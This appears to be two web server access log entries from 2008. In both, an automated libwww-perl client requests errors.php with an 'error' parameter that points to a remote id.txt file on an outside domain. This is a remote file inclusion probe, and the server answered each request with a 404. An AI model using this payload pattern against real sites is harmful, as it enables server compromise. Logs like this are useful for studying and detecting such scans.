77.221.130.15 - - [14/Jul/2008:10:43:15 -0700] "GET //errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:10:43:17 -0700] "GET /logs//errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
